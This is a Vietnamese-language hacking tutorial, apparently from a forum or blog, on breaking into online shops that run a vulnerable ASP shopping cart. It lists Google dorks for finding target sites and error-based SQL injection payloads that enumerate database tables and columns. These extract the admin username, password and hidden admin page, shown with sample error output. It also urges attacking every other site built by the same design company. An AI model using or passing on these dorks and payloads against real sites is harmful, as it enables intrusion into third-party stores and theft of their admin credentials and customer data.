http://ngonlua1990.net/2tab/
Link hack1
Khi hack shop thỉnh thoảng bạn gặp lỗi VBscript-runtime error
vd :http://victim.com?id=10, thông thường thì bạn hay bỏ qua nó vì không biết hack, nhưng bạn hãy thay id=cat xem , đảm bảo 80% sẽ xảy ra lỗi SQL --> khi đó hãy khai thác.
Gặp các shop lỗi nào ngon ,có thể hack được , bạn hãy chú ý dưới footer của trang web.Thông thường thì nó sẽ ghi tên công ty thiết kế shop này(Desgin by).Đừng bỏ qua nó, hãy đi ngược trở lại trang của nó, vào mục khách hàng để xem các trang nó đã làm.Mình đảm bảo với các bạn những trang shop khác sẽ bị lỗi y hệt trang mình vừa hack.Tất cả cấu trúc trang web y xì nhau(vì cùng 1 công ty làm ra mà)
1 -Search : http://www.google.com/ hoặc http://www.search.com/
2 -allinurl:”shopdisplayproducts.asp?id="
-allinurl:”.com/shopdisplayproducts.asp?id= " (.com,info,net,biz,us..vv )
-allinurl:”.com/shopdisplayproducts.asp?id=9" ( 1,2,3...vv )
3 - '
4 - Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed
quotation mark before the character string ''./shopping/
shopdisplayproducts.asp, line 93
5 - Microsoft JET Database Engine error '80040e14' Syntax error
in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid
=c.categoryid and c.catdescription like '5'%' and hide=0 order by
specialoffer desc,cname'. /shop$db.asp, line 467
6 Get Data
and 1=convert(int,(select top 1 table_name from information_schema.tables))--sp_password
7 and 1=convert(int,(select top 1 table_name from information_schema.tables where
table_name not in ('ver_Faq')))--sp_password
8 Get Column
and 1=convert(int,(select top 1 column_name from information_schema.columns where
table_name=('tbluser')))--sp_password
9 and 1=convert(int,(select top 1 column_ name from information_schema.columns where
table_name=('tbluser') and column_name not in ('fldauto')))--sp_password
10 Get pass
and 1=convert(int,(select top 1 fldusername from tbluser))--sp_passwordMicrosoft OLE DB
Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL
Server]Syntax error converting the nvarchar value 'admin' to a column of data type
int. /shopping/shopdisplayproducts.asp, line 93
11 Get User
and 1=convert(int,(select top 1 fldpassword from tbluser))--sp_passwordMicrosoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '1234' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93
12 http://www.victim.com/shopping/shopadmin.asp
and 1=convert(int,(select top 1 fieldname%2b'/'%2bfieldvalue from configuration where fieldname='xadminpage'))--sp_passwordTrích:Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'xadminpage/5h0padm1n.asp' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93
